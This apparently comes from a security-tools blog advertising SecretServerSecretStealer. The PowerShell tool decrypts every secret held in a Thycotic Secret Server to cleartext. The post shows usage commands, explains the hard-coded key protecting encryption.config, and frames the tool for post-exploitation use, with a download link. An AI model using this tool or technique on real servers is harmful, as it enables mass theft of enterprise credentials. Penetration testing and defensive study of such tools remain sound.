SecretServerSecretStealer: Decrypt Thycotic Server Passwords!

Exciting things are being done in PowerShell now-a-days and it is becoming like Python. A good example is my last post about PivotAll. This post is about another such tool – SecretServerSecretStealer.


What is SecretServerSecretStealer?

SecretServerSecretStealer (Invoke-SecretStealer) is an open source PowerShell script, that helps you decrypt passwords and other information stored in a Thycotic Secret Server installation. It does so by exposing the following methods:

  1. Invoke-SecretDecrypt: It requires you to manually pass the various data needed to decrypt a single secret. You can retrieve the following fields from a database: tbSecret.key, tbSecret.IvMEK, tbSecretItem.IV and tbSecretItem.ItemValue.

    Invoke-SecretDecrypt -EncryptionConfig C:\Users\user\encryption.config -Item 9993c5097491ba2b42a10b9a9b7a6ab7239b107337c348086eeb5f5b29c76f33 -IV CF4C2D4F7FA432D64D9712212A06EEA9 -Key 5C195A500A3BF87C29163A52AC4EA2CFF6C5B69407B6F91A7C7B100B6D20121AAFD052C11B13D542EA2F42137258C2EF -IvMEK 6080667306DA295A75E22667E9AD0376
  2. Invoke-SecretStealer: It is designed to be run on a Thycotic Secret Server machine itself, and takes only the web root as a parameter. Invoke-SecretStealer will decrypt the database configuration and connect to the applications database to extract all the relevant information, and then decrypts all secrets contained within to cleartext.

    Invoke-SecretStealer -WebRoot 'C:\inetpub\wwwroot\SecretServer'

The Thycotic Secret Server allows you to store, distribute, modify and audit enterprise passwords in a secure environment. It works by creating multiple items for every entry, such as a password, name, URL, etc. Each of these items are then encrypted with an intermediate key that is specific to that entry. That intermediate key is further encrypted by a master key, which is unique to each installation and stored in the encryption.config file. The encryption.config file itself is a binary serialized object that is encrypted with a hard coded key and initialization vector (hint: Thycotic.ihawu.Base.FileHydrator class).

This can be used post exploitation when you have access to a Thycotic Secret Server or even if you have physical access to one. Surprisingly, Thycotic knows about this script and has released a support article here. Interesting cat and mouse game here. Want to know who wins? Keep watching this space for the results!

Download SecretServerSecretStealer:

Get the latest version of SecretStealer.ps1 here.